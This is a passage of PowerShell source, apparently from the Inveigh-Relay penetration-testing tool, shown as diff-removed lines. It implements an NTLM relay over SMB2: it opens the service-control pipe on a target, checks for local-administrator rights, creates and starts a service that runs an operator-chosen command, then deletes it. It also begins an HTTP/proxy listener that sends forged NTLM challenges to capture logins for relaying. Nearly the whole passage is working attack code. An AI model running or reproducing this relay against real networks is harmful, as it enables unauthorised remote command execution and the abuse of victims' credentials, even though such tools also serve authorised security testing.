- $packet_SMB2_header = Get-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
- $packet_SMB2_data["SMB2CreateRequestFile_Share_Access"] = 0x07,0x00,0x00,0x00
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'RPCBind'
- }
-
- 'RPCBind'
- {
- $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
- $SMB_file_ID = $SMB_client_receive[132..147]
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'OpenSCManagerW'
- }
-
- 'ReadRequest'
- {
-
- Start-Sleep -m 150
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_header["SMB2Header_CreditCharge"] = 0x10,0x00
- $packet_SMB2_data = Get-PacketSMB2ReadRequest $SMB_file_ID
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
- {
- $SMB_client_stage = $SMB_client_stage_next
- }
- else
- {
- $SMB_client_stage = 'StatusPending'
- }
-
- }
-
- 'StatusPending'
- {
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
- {
- $SMB_client_stage = $SMB_client_stage_next
- }
-
- }
-
- 'OpenSCManagerW'
- {
- $SMB2_message_ID = 30
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'CheckAccess'
- }
-
- 'CheckAccess'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
- $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($SCM_data.Length -lt $SMB_split_index)
- {
- $SMB_client_stage = 'CreateServiceW'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_First'
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'CreateServiceW'
- {
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'CreateServiceW_First'
- {
- $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $SMB2_message_ID += 20
- $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
- $packet_RPC_data = Get-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
- $SMB_split_index_tracker = $SMB_split_index
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage_final -le 2)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_split_stage = 2
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Middle'
- {
- $SMB_split_stage++
- $SMB2_message_ID++
- $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
- $SMB_split_index_tracker += $SMB_split_index
- $packet_RPC_data = Get-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage -ge $SMB_split_stage_final)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Last'
- {
- $SMB2_message_ID++
- $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
- $packet_RPC_data = Get-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'StartServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
- }
-
- $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
- $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
- $SMB_service_context_handle = $SMB_client_receive[112..131]
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'DeleteServiceW'
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'DeleteServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay command executed on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("SMB relay service $SMB_service failed to start on $Target")
- }
-
- }
-
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'CloseServiceHandle'
- $SMB_close_service_handle_stage = 1
- }
-
- 'CloseServiceHandle'
- {
-
- if($SMB_close_service_handle_stage -eq 1)
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
- $SMB2_message_ID += 20
- $SMB_close_service_handle_stage++
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- }
- else
- {
- $SMB2_message_ID += 1
- $SMB_client_stage = 'CloseRequest'
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
- }
-
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- }
-
- 'CloseRequest'
- {
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2CloseRequest $SMB_file_ID
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'TreeDisconnect'
- }
-
- 'TreeDisconnect'
- {
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2TreeDisconnectRequest
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Logoff'
- }
-
- 'Logoff'
- {
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2SessionLogoffRequest
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Exit'
- }
-
- }
-
- if($SMB_relay_failed)
- {
- $inveigh.console_queue.Add("SMB relay failed on $Target")
- $SMB_client_stage = 'Exit'
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- }
-
- }
-
- }
-
- if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y')
- {
- $inveigh.console_queue.Add("SMB relay auto disabled due to success")
- $inveigh.SMB_relay = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")
- }
-
- }
-
- }
-
- $SMB_relay_socket.Close()
-
- return $SMB_client_receive
- }
-
-}
-
-# HTTP/HTTPS/Proxy Server ScriptBlock
-$HTTP_scriptblock =
-{
- param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,$Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$Usernames,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
-
- function NTLMChallengeBase64
- {
- param ([String]$Challenge,[String]$ClientIPAddress,[Int]$ClientPort)
-
- $HTTP_timestamp = Get-Date
- $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
- $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
- $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
- if($Challenge)
- {
- $HTTP_challenge = $Challenge
- $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
- $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
- else
- {
- $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
- $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
-
- $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
-
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
- $HTTP_challenge_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
- 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
- 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
- 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
- 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
- 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
- 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
- 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
- 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
- $HTTP_timestamp +
- 0x00,0x00,0x00,0x00,0x0a,0x0a
-
- $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
- $NTLM = 'NTLM ' + $NTLM_challenge_base64
- $NTLM_challenge = $HTTP_challenge
-
- return $NTLM
- }
-
- if($HTTPS_listener)
- {
- $HTTP_type = "HTTPS"
- }
- elseif($proxy_listener)
- {
- $HTTP_type = "Proxy"
- }
- else
- {
- $HTTP_type = "HTTP"
- }
-
- if($HTTPIP -ne '0.0.0.0')
- {
- $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
- $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
- }
- else
- {
- $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
- }
-
- $HTTP_running = $true
- $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
- $HTTP_client_close = $true
- $relay_step = 0
-
- if($proxy_listener)
- {
- $HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
- $HTTP_listener.Server.LingerState = $HTTP_linger
